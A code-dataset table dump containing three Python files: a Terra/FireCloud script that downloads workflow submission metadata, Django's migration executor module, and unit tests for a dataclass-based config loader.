hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f72eaedaba0b8ff86ee1179bca09e69c0be08394 | 5,122 | py | Python | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | null | null | null | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | null | null | null | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | 1 | 2020-11-10T22:02:21.000Z | 2020-11-10T22:02:21.000Z | #!/usr/bin/env python3
import argparse
import copy
import datetime
#from firecloud import fiss
import json
import operator
import subprocess
import sys
import time
#print(fiss.meth_list(args=argparse.Namespace()))
import firecloud.api as fapi
SEL_NAMESPACE='um1-encode-y2s1'
SEL_WORKSPACE='selection-sim'
#dir(fapi)
#help(fapi)
z = fapi.list_workspace_configs(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, allRepos=True).json()
print(z)
z = fapi.get_workspace_config(workspace=SEL_WORKSPACE, namespace=SEL_NAMESPACE,
config='dockstore-tool-cms2', cnamespace=SEL_NAMESPACE)
print('CONFIG_IS', z, z.json())
def dump_file(fname, value):
"""store string in file"""
with open(fname, 'w') as out:
out.write(str(value))
#z = fapi.create_submission(wnamespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE,
# cnamespace=SEL_NAMESPACE, config='dockstore-tool-cosi2')
#print('SUBMISSION IS', z, z.json())
#z = fapi.get_config_template(namespace='dockstore', method='dockstore-tool-cosi2', version=1)
#print(z.json())
def _pretty_print_json(json_dict, sort_keys=True):
"""Return a pretty-printed version of a dict converted to json, as a string."""
return json.dumps(json_dict, indent=4, separators=(',', ': '), sort_keys=sort_keys)
def _write_json(fname, **json_dict):
dump_file(fname=fname, value=_pretty_print_json(json_dict))
print('converting', fname, 'to org')
subprocess.check_call(f'./util/to_org.sh {fname}', shell=True)
print('converted', fname, 'to org')
def get_workflow_metadata_gz(namespace, workspace, submission_id, workflow_id):
"""Request the metadata for a workflow in a submission.
Args:
namespace (str): project to which workspace belongs
workspace (str): Workspace name
submission_id (str): Submission's unique identifier
workflow_id (str): Workflow's unique identifier.
Swagger:
https://api.firecloud.org/#!/Submissions/workflowMetadata
"""
uri = "workspaces/{0}/{1}/submissions/{2}/workflows/{3}".format(namespace,
workspace, submission_id, workflow_id)
headers = copy.deepcopy(fapi._fiss_agent_header())
headers.update({'Accept-Encoding': 'gzip', 'User-Agent': 'gzip'})
return fapi.__get(uri, headers=headers)
#print('ENTITIES ARE', fapi.list_entity_types(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE).json())
z = fapi.list_submissions(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE)
#print('SUBMISSIONS ARE', z, z.json())
_write_json('tmp/submissions.json', **{'result': list(z.json())})
tot_time = 0
for submission_idx, s in enumerate(sorted(list(z.json()), key=operator.itemgetter('submissionDate'), reverse=True)):
print('looking at submission from', s['submissionDate'])
submission_date = s['submissionDate']
if not submission_date.startswith(datetime.datetime.now().strftime('%Y-%m-%d')):
print('skipping submission date ', submission_date)
continue
print('====================================================')
print(s)
print('getting submission')
submission_id = s['submissionId']
y = fapi.get_submission(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id).json()
print('got submission')
_write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.subm.json', **y)
if 'workflowId' not in y['workflows'][0]:
print('workflow ID missing from submission!')
continue
print('getting workflow metadata for workflow id ', y['workflows'][0]['workflowId'])
beg = time.time()
zz_result = get_workflow_metadata_gz(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id,
workflow_id=y['workflows'][0]['workflowId'])
print('ZZ_RESULT: ', type(zz_result), dir(zz_result), zz_result)
for f in dir(zz_result):
print(' ', f, ' = ', getattr(zz_result, f))
print('ZZ_RESULT.raw: ', type(zz_result.raw), dir(zz_result.raw), zz_result.raw)
for f in dir(zz_result.raw):
print(' ', f, ' = ', getattr(zz_result.raw, f))
print('converting workflow metadata to json')
try:
zz = zz_result.json()
except Exception as e:
print('Error converting to json:', e)
zz = {}
tot_time += (time.time() - beg)
print('saving workflow metadata')
_write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.mdata.json', **zz)
if 'submittedFiles' in zz:
dump_file(fname=f'tmp/{submission_date}.{submission_idx}.{submission_id}.workflow.wdl', value=zz['submittedFiles']['workflow'])
#succ = [v["succeeded"] for v in zz['outputs']["run_sims_cosi2.replicaInfos"]]
#print(f'Succeeded: {sum(succ)} of {len(succ)}')
# zzz = fapi.get_workflow_metadata(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=s['submissionId'],
# workflow_id='ad1e8271-fe66-4e05-9005-af570e9e5884').json()
# _write_json('tmp/jz.json', **zzz)
print('tot_time=', tot_time, file=sys.stderr)
| 42.330579 | 135 | 0.679617 |
import argparse
import copy
import datetime
import json
import operator
import subprocess
import sys
import time
import firecloud.api as fapi
SEL_NAMESPACE='um1-encode-y2s1'
SEL_WORKSPACE='selection-sim'
z = fapi.list_workspace_configs(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, allRepos=True).json()
print(z)
z = fapi.get_workspace_config(workspace=SEL_WORKSPACE, namespace=SEL_NAMESPACE,
config='dockstore-tool-cms2', cnamespace=SEL_NAMESPACE)
print('CONFIG_IS', z, z.json())
def dump_file(fname, value):
with open(fname, 'w') as out:
out.write(str(value))
def _pretty_print_json(json_dict, sort_keys=True):
return json.dumps(json_dict, indent=4, separators=(',', ': '), sort_keys=sort_keys)
def _write_json(fname, **json_dict):
dump_file(fname=fname, value=_pretty_print_json(json_dict))
print('converting', fname, 'to org')
subprocess.check_call(f'./util/to_org.sh {fname}', shell=True)
print('converted', fname, 'to org')
def get_workflow_metadata_gz(namespace, workspace, submission_id, workflow_id):
uri = "workspaces/{0}/{1}/submissions/{2}/workflows/{3}".format(namespace,
workspace, submission_id, workflow_id)
headers = copy.deepcopy(fapi._fiss_agent_header())
headers.update({'Accept-Encoding': 'gzip', 'User-Agent': 'gzip'})
return fapi.__get(uri, headers=headers)
z = fapi.list_submissions(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE)
_write_json('tmp/submissions.json', **{'result': list(z.json())})
tot_time = 0
for submission_idx, s in enumerate(sorted(list(z.json()), key=operator.itemgetter('submissionDate'), reverse=True)):
print('looking at submission from', s['submissionDate'])
submission_date = s['submissionDate']
if not submission_date.startswith(datetime.datetime.now().strftime('%Y-%m-%d')):
print('skipping submission date ', submission_date)
continue
print('====================================================')
print(s)
print('getting submission')
submission_id = s['submissionId']
y = fapi.get_submission(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id).json()
print('got submission')
_write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.subm.json', **y)
if 'workflowId' not in y['workflows'][0]:
print('workflow ID missing from submission!')
continue
print('getting workflow metadata for workflow id ', y['workflows'][0]['workflowId'])
beg = time.time()
zz_result = get_workflow_metadata_gz(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id,
workflow_id=y['workflows'][0]['workflowId'])
print('ZZ_RESULT: ', type(zz_result), dir(zz_result), zz_result)
for f in dir(zz_result):
print(' ', f, ' = ', getattr(zz_result, f))
print('ZZ_RESULT.raw: ', type(zz_result.raw), dir(zz_result.raw), zz_result.raw)
for f in dir(zz_result.raw):
print(' ', f, ' = ', getattr(zz_result.raw, f))
print('converting workflow metadata to json')
try:
zz = zz_result.json()
except Exception as e:
print('Error converting to json:', e)
zz = {}
tot_time += (time.time() - beg)
print('saving workflow metadata')
_write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.mdata.json', **zz)
if 'submittedFiles' in zz:
dump_file(fname=f'tmp/{submission_date}.{submission_idx}.{submission_id}.workflow.wdl', value=zz['submittedFiles']['workflow'])
print('tot_time=', tot_time, file=sys.stderr)
| true | true |
f72eaf3c67b409384826a341503758bb4a502d32 | 14,180 | py | Python | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import unicode_literals
from django.apps.registry import apps as global_apps
from django.db import migrations
from .exceptions import InvalidMigrationPlan
from .loader import MigrationLoader
from .recorder import MigrationRecorder
from .state import ProjectState
class MigrationExecutor(object):
"""
End-to-end migration execution - loads migrations, and runs them
up or down to a specified set of targets.
"""
def __init__(self, connection, progress_callback=None):
self.connection = connection
self.loader = MigrationLoader(self.connection)
self.recorder = MigrationRecorder(self.connection)
self.progress_callback = progress_callback
def migration_plan(self, targets, clean_start=False):
"""
Given a set of targets, returns a list of (Migration instance, backwards?).
"""
plan = []
if clean_start:
applied = set()
else:
applied = set(self.loader.applied_migrations)
for target in targets:
# If the target is (app_label, None), that means unmigrate everything
if target[1] is None:
for root in self.loader.graph.root_nodes():
if root[0] == target[0]:
for migration in self.loader.graph.backwards_plan(root):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
# If the migration is already applied, do backwards mode,
# otherwise do forwards mode.
elif target in applied:
# Don't migrate backwards all the way to the target node (that
# may roll back dependencies in other apps that don't need to
# be rolled back); instead roll back through target's immediate
# child(ren) in the same app, and no further.
next_in_app = sorted(
n for n in
self.loader.graph.node_map[target].children
if n[0] == target[0]
)
for node in next_in_app:
for migration in self.loader.graph.backwards_plan(node):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
else:
for migration in self.loader.graph.forwards_plan(target):
if migration not in applied:
plan.append((self.loader.graph.nodes[migration], False))
applied.add(migration)
return plan
def migrate(self, targets, plan=None, fake=False, fake_initial=False):
"""
Migrates the database up to the given targets.
Django first needs to create all project states before a migration is
(un)applied and in a second step run all the database operations.
"""
if plan is None:
plan = self.migration_plan(targets)
# Create the forwards plan Django would follow on an empty database
full_plan = self.migration_plan(self.loader.graph.leaf_nodes(), clean_start=True)
all_forwards = all(not backwards for mig, backwards in plan)
all_backwards = all(backwards for mig, backwards in plan)
if not plan:
pass # Nothing to do for an empty plan
elif all_forwards == all_backwards:
# This should only happen if there's a mixed plan
raise InvalidMigrationPlan(
"Migration plans with both forwards and backwards migrations "
"are not supported. Please split your migration process into "
"separate plans of only forwards OR backwards migrations.",
plan
)
elif all_forwards:
self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
else:
# No need to check for `elif all_backwards` here, as that condition
# would always evaluate to true.
self._migrate_all_backwards(plan, full_plan, fake=fake)
self.check_replacements()
def _migrate_all_forwards(self, plan, full_plan, fake, fake_initial):
"""
Take a list of 2-tuples of the form (migration instance, False) and
apply them in the order they occur in the full_plan.
"""
migrations_to_run = {m[0] for m in plan}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
if self.progress_callback:
self.progress_callback("render_start")
state.apps # Render all -- performance critical
if self.progress_callback:
self.progress_callback("render_success")
state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
def _migrate_all_backwards(self, plan, full_plan, fake):
"""
Take a list of 2-tuples of the form (migration instance, True) and
unapply them in reverse order they occur in the full_plan.
Since unapplying a migration requires the project state prior to that
migration, Django will compute the migration states before each of them
in a first run over the plan and then unapply them in a second run over
the plan.
"""
migrations_to_run = {m[0] for m in plan}
# Holds all migration states prior to the migrations being unapplied
states = {}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
if self.progress_callback:
self.progress_callback("render_start")
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
state.apps # Render all -- performance critical
# The state before this migration
states[migration] = state
# The old state keeps as-is, we continue with the new state
state = migration.mutate_state(state, preserve=True)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
if self.progress_callback:
self.progress_callback("render_success")
for migration, _ in plan:
self.unapply_migration(states[migration], migration, fake=fake)
def collect_sql(self, plan):
"""
Takes a migration plan and returns a list of collected SQL
statements that represent the best-efforts version of that plan.
"""
statements = []
state = None
for migration, backwards in plan:
with self.connection.schema_editor(collect_sql=True) as schema_editor:
if state is None:
state = self.loader.project_state((migration.app_label, migration.name), at_end=False)
if not backwards:
state = migration.apply(state, schema_editor, collect_sql=True)
else:
state = migration.unapply(state, schema_editor, collect_sql=True)
statements.extend(schema_editor.collected_sql)
return statements
def apply_migration(self, state, migration, fake=False, fake_initial=False):
"""
Runs a migration forwards.
"""
if self.progress_callback:
self.progress_callback("apply_start", migration, fake)
if not fake:
if fake_initial:
# Test to see if this is an already-applied initial migration
applied, state = self.detect_soft_applied(state, migration)
if applied:
fake = True
if not fake:
# Alright, do it normally
with self.connection.schema_editor() as schema_editor:
state = migration.apply(state, schema_editor)
# For replacement migrations, record individual statuses
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_applied(app_label, name)
else:
self.recorder.record_applied(migration.app_label, migration.name)
# Report progress
if self.progress_callback:
self.progress_callback("apply_success", migration, fake)
return state
def unapply_migration(self, state, migration, fake=False):
"""
Runs a migration backwards.
"""
if self.progress_callback:
self.progress_callback("unapply_start", migration, fake)
if not fake:
with self.connection.schema_editor() as schema_editor:
state = migration.unapply(state, schema_editor)
# For replacement migrations, record individual statuses
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_unapplied(app_label, name)
else:
self.recorder.record_unapplied(migration.app_label, migration.name)
# Report progress
if self.progress_callback:
self.progress_callback("unapply_success", migration, fake)
return state
def check_replacements(self):
"""
Mark replacement migrations applied if their replaced set all are.
We do this unconditionally on every migrate, rather than just when
migrations are applied or unapplied, so as to correctly handle the case
when a new squash migration is pushed to a deployment that already had
all its replaced migrations applied. In this case no new migration will
be applied, but we still want to correctly maintain the applied state
of the squash migration.
"""
applied = self.recorder.applied_migrations()
for key, migration in self.loader.replacements.items():
all_applied = all(m in applied for m in migration.replaces)
if all_applied and key not in applied:
self.recorder.record_applied(*key)
def detect_soft_applied(self, project_state, migration):
"""
Tests whether a migration has been implicitly applied - that the
tables or columns it would create exist. This is intended only for use
on initial migrations (as it only looks for CreateModel and AddField).
"""
if migration.initial is None:
# Bail if the migration isn't the first one in its app
if any(app == migration.app_label for app, name in migration.dependencies):
return False, project_state
elif migration.initial is False:
# Bail if it's NOT an initial migration
return False, project_state
if project_state is None:
after_state = self.loader.project_state((migration.app_label, migration.name), at_end=True)
else:
after_state = migration.mutate_state(project_state)
apps = after_state.apps
found_create_model_migration = False
found_add_field_migration = False
# Make sure all create model and add field operations are done
for operation in migration.operations:
if isinstance(operation, migrations.CreateModel):
model = apps.get_model(migration.app_label, operation.name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# embedded app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
if model._meta.db_table not in self.connection.introspection.table_names(self.connection.cursor()):
return False, project_state
found_create_model_migration = True
elif isinstance(operation, migrations.AddField):
model = apps.get_model(migration.app_label, operation.model_name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# embedded app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
table = model._meta.db_table
db_field = model._meta.get_field(operation.name).column
fields = self.connection.introspection.get_table_description(self.connection.cursor(), table)
if db_field not in (f.name for f in fields):
return False, project_state
found_add_field_migration = True
# If we get this far and we found at least one CreateModel or AddField migration,
# the migration is considered implicitly applied.
return (found_create_model_migration or found_add_field_migration), after_state
| 47.424749 | 115 | 0.61488 | from __future__ import unicode_literals
from django.apps.registry import apps as global_apps
from django.db import migrations
from .exceptions import InvalidMigrationPlan
from .loader import MigrationLoader
from .recorder import MigrationRecorder
from .state import ProjectState
class MigrationExecutor(object):
def __init__(self, connection, progress_callback=None):
self.connection = connection
self.loader = MigrationLoader(self.connection)
self.recorder = MigrationRecorder(self.connection)
self.progress_callback = progress_callback
def migration_plan(self, targets, clean_start=False):
plan = []
if clean_start:
applied = set()
else:
applied = set(self.loader.applied_migrations)
for target in targets:
if target[1] is None:
for root in self.loader.graph.root_nodes():
if root[0] == target[0]:
for migration in self.loader.graph.backwards_plan(root):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
elif target in applied:
# may roll back dependencies in other apps that don't need to
# child(ren) in the same app, and no further.
next_in_app = sorted(
n for n in
self.loader.graph.node_map[target].children
if n[0] == target[0]
)
for node in next_in_app:
for migration in self.loader.graph.backwards_plan(node):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
else:
for migration in self.loader.graph.forwards_plan(target):
if migration not in applied:
plan.append((self.loader.graph.nodes[migration], False))
applied.add(migration)
return plan
def migrate(self, targets, plan=None, fake=False, fake_initial=False):
if plan is None:
plan = self.migration_plan(targets)
# Create the forwards plan Django would follow on an empty database
full_plan = self.migration_plan(self.loader.graph.leaf_nodes(), clean_start=True)
all_forwards = all(not backwards for mig, backwards in plan)
all_backwards = all(backwards for mig, backwards in plan)
if not plan:
pass # Nothing to do for an empty plan
elif all_forwards == all_backwards:
# This should only happen if there's a mixed plan
raise InvalidMigrationPlan(
"Migration plans with both forwards and backwards migrations "
"are not supported. Please split your migration process into "
"separate plans of only forwards OR backwards migrations.",
plan
)
elif all_forwards:
self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
else:
self._migrate_all_backwards(plan, full_plan, fake=fake)
self.check_replacements()
def _migrate_all_forwards(self, plan, full_plan, fake, fake_initial):
migrations_to_run = {m[0] for m in plan}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
for migration, _ in full_plan:
if not migrations_to_run:
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
if self.progress_callback:
self.progress_callback("render_start")
state.apps # Render all -- performance critical
if self.progress_callback:
self.progress_callback("render_success")
state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
def _migrate_all_backwards(self, plan, full_plan, fake):
migrations_to_run = {m[0] for m in plan}
# Holds all migration states prior to the migrations being unapplied
states = {}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
if self.progress_callback:
self.progress_callback("render_start")
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
state.apps
states[migration] = state
state = migration.mutate_state(state, preserve=True)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
if self.progress_callback:
self.progress_callback("render_success")
for migration, _ in plan:
self.unapply_migration(states[migration], migration, fake=fake)
def collect_sql(self, plan):
statements = []
state = None
for migration, backwards in plan:
with self.connection.schema_editor(collect_sql=True) as schema_editor:
if state is None:
state = self.loader.project_state((migration.app_label, migration.name), at_end=False)
if not backwards:
state = migration.apply(state, schema_editor, collect_sql=True)
else:
state = migration.unapply(state, schema_editor, collect_sql=True)
statements.extend(schema_editor.collected_sql)
return statements
def apply_migration(self, state, migration, fake=False, fake_initial=False):
if self.progress_callback:
self.progress_callback("apply_start", migration, fake)
if not fake:
if fake_initial:
applied, state = self.detect_soft_applied(state, migration)
if applied:
fake = True
if not fake:
with self.connection.schema_editor() as schema_editor:
state = migration.apply(state, schema_editor)
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_applied(app_label, name)
else:
self.recorder.record_applied(migration.app_label, migration.name)
if self.progress_callback:
self.progress_callback("apply_success", migration, fake)
return state
def unapply_migration(self, state, migration, fake=False):
if self.progress_callback:
self.progress_callback("unapply_start", migration, fake)
if not fake:
with self.connection.schema_editor() as schema_editor:
state = migration.unapply(state, schema_editor)
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_unapplied(app_label, name)
else:
self.recorder.record_unapplied(migration.app_label, migration.name)
if self.progress_callback:
self.progress_callback("unapply_success", migration, fake)
return state
def check_replacements(self):
applied = self.recorder.applied_migrations()
for key, migration in self.loader.replacements.items():
all_applied = all(m in applied for m in migration.replaces)
if all_applied and key not in applied:
self.recorder.record_applied(*key)
def detect_soft_applied(self, project_state, migration):
if migration.initial is None:
if any(app == migration.app_label for app, name in migration.dependencies):
return False, project_state
elif migration.initial is False:
# Bail if it's NOT an initial migration
return False, project_state
if project_state is None:
after_state = self.loader.project_state((migration.app_label, migration.name), at_end=True)
else:
after_state = migration.mutate_state(project_state)
apps = after_state.apps
found_create_model_migration = False
found_add_field_migration = False
for operation in migration.operations:
if isinstance(operation, migrations.CreateModel):
model = apps.get_model(migration.app_label, operation.name)
if model._meta.swapped:
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
if model._meta.db_table not in self.connection.introspection.table_names(self.connection.cursor()):
return False, project_state
found_create_model_migration = True
elif isinstance(operation, migrations.AddField):
model = apps.get_model(migration.app_label, operation.model_name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# embedded app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
table = model._meta.db_table
db_field = model._meta.get_field(operation.name).column
fields = self.connection.introspection.get_table_description(self.connection.cursor(), table)
if db_field not in (f.name for f in fields):
return False, project_state
found_add_field_migration = True
return (found_create_model_migration or found_add_field_migration), after_state
| true | true |
f72eafd27fb8361f96937936ad725718e5ac8bea | 3,705 | py | Python | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | null | null | null | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | 2 | 2022-03-31T03:01:39.000Z | 2022-03-31T03:02:48.000Z | bat/tests/conf_test.py | lundybernard/metal-snake | 4ae39cc3b4e070625a67bf1df0e7e53d01c19ab1 | [
"MIT"
] | null | null | null | from unittest import TestCase
from unittest.mock import patch
from dataclasses import dataclass
import yaml
from ..conf import (
get_config,
Namespace,
)
SRC = 'bat.conf'
EXAMPLE_CONFIG_YAML = '''
default: example
example:
bat:
key: value
remote_host:
api_key: example_api_key
url: https://api-example.host.io/
alt:
bat:
module:
key: alt_value
'''
EXAMPLE_CONFIG_DICT = yaml.load(EXAMPLE_CONFIG_YAML, Loader=yaml.BaseLoader)
class Test_get_config(TestCase):
def setUp(t):
patches = ['FileConfig', ]
for target in patches:
patcher = patch(f'{SRC}.{target}', autospec=True)
setattr(t, target, patcher.start())
t.addCleanup(patcher.stop)
t.config_file_data = {
'default': 'test_config',
'test_config': {
'bat': {
'AModule': {
'arg_1': 'conf_file_arg_1',
'arg_2': 'conf_file_arg_2',
},
'BModule': {'arg_1': '2020-20-21', },
}
}
}
@dataclass
class ConfA:
arg_1: str = 'dataclass_default_arg_1'
arg_2: str = 'dataclass_default_arg_2'
arg_3: str = 'dataclass_default_arg_3'
@dataclass
class ConfB:
arg_1: str = 'dataclass_default_isodate'
# As if imported from a module
ConfA.__module__ = 'bat.AModule'
ConfB.__module__ = 'bat.BModule'
@dataclass
class GlobalConfig:
AModule: ConfA
BModule: ConfB
config_file: str = './GlobalConfig.yaml'
GlobalConfig.__module__ = 'bat'
t.GlobalConfig = GlobalConfig
@patch(f'{SRC}.EnvConfig', autospec=True)
def test_default_values(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
CONF = get_config(t.GlobalConfig)
t.assertEqual(CONF.AModule.arg_3, 'dataclass_default_arg_3')
t.assertEqual(CONF.BModule.arg_1, 'dataclass_default_isodate')
def test_arg_cli_args(t):
cli_args = Namespace(arg_1='cli_arg_1')
conf = get_config(t.GlobalConfig, cli_args=cli_args)
t.assertEqual(conf.AModule.arg_1, 'cli_arg_1')
def test_arg_config_file(t):
'''The given config_file parameter is used for attribute lookups
'''
config_file = t.FileConfig.return_value
conf = get_config(t.GlobalConfig, config_file=config_file)
t.assertEqual(conf.AModule.arg_1, config_file.get.return_value)
config_file.get.assert_called_with('arg_1', module='bat.AModule')
def test_arg_config_file_name(t):
'''The given config_file_name is passed to the FileConfig constructor
'''
config_file_name = './test.config.yaml'
get_config(
t.GlobalConfig, config_file_name=config_file_name
)
t.FileConfig.assert_called_with(config_file_name, config_env=None)
def test_arg_config_env(t):
'''The given config_env name is passed to the FileConfig constructor
'''
config_env = 'configuration file environment'
get_config(t.GlobalConfig, config_env=config_env)
t.FileConfig.assert_called_with(None, config_env=config_env)
@patch(f'{SRC}.EnvConfig', autospec=True)
def test__getattr__missing_attribute(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
conf = get_config(t.GlobalConfig)
with t.assertRaises(AttributeError):
conf._sir_not_appearing_in_this_film
| 28.5 | 77 | 0.615115 | from unittest import TestCase
from unittest.mock import patch
from dataclasses import dataclass
import yaml
from ..conf import (
get_config,
Namespace,
)
SRC = 'bat.conf'
EXAMPLE_CONFIG_YAML = '''
default: example
example:
bat:
key: value
remote_host:
api_key: example_api_key
url: https://api-example.host.io/
alt:
bat:
module:
key: alt_value
'''
EXAMPLE_CONFIG_DICT = yaml.load(EXAMPLE_CONFIG_YAML, Loader=yaml.BaseLoader)
class Test_get_config(TestCase):
def setUp(t):
patches = ['FileConfig', ]
for target in patches:
patcher = patch(f'{SRC}.{target}', autospec=True)
setattr(t, target, patcher.start())
t.addCleanup(patcher.stop)
t.config_file_data = {
'default': 'test_config',
'test_config': {
'bat': {
'AModule': {
'arg_1': 'conf_file_arg_1',
'arg_2': 'conf_file_arg_2',
},
'BModule': {'arg_1': '2020-20-21', },
}
}
}
@dataclass
class ConfA:
arg_1: str = 'dataclass_default_arg_1'
arg_2: str = 'dataclass_default_arg_2'
arg_3: str = 'dataclass_default_arg_3'
@dataclass
class ConfB:
arg_1: str = 'dataclass_default_isodate'
ConfA.__module__ = 'bat.AModule'
ConfB.__module__ = 'bat.BModule'
@dataclass
class GlobalConfig:
AModule: ConfA
BModule: ConfB
config_file: str = './GlobalConfig.yaml'
GlobalConfig.__module__ = 'bat'
t.GlobalConfig = GlobalConfig
@patch(f'{SRC}.EnvConfig', autospec=True)
def test_default_values(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
CONF = get_config(t.GlobalConfig)
t.assertEqual(CONF.AModule.arg_3, 'dataclass_default_arg_3')
t.assertEqual(CONF.BModule.arg_1, 'dataclass_default_isodate')
def test_arg_cli_args(t):
cli_args = Namespace(arg_1='cli_arg_1')
conf = get_config(t.GlobalConfig, cli_args=cli_args)
t.assertEqual(conf.AModule.arg_1, 'cli_arg_1')
def test_arg_config_file(t):
config_file = t.FileConfig.return_value
conf = get_config(t.GlobalConfig, config_file=config_file)
t.assertEqual(conf.AModule.arg_1, config_file.get.return_value)
config_file.get.assert_called_with('arg_1', module='bat.AModule')
def test_arg_config_file_name(t):
config_file_name = './test.config.yaml'
get_config(
t.GlobalConfig, config_file_name=config_file_name
)
t.FileConfig.assert_called_with(config_file_name, config_env=None)
def test_arg_config_env(t):
config_env = 'configuration file environment'
get_config(t.GlobalConfig, config_env=config_env)
t.FileConfig.assert_called_with(None, config_env=config_env)
@patch(f'{SRC}.EnvConfig', autospec=True)
def test__getattr__missing_attribute(t, EnvConfig):
t.FileConfig.return_value = None
EnvConfig.return_value = None
conf = get_config(t.GlobalConfig)
with t.assertRaises(AttributeError):
conf._sir_not_appearing_in_this_film
| true | true |
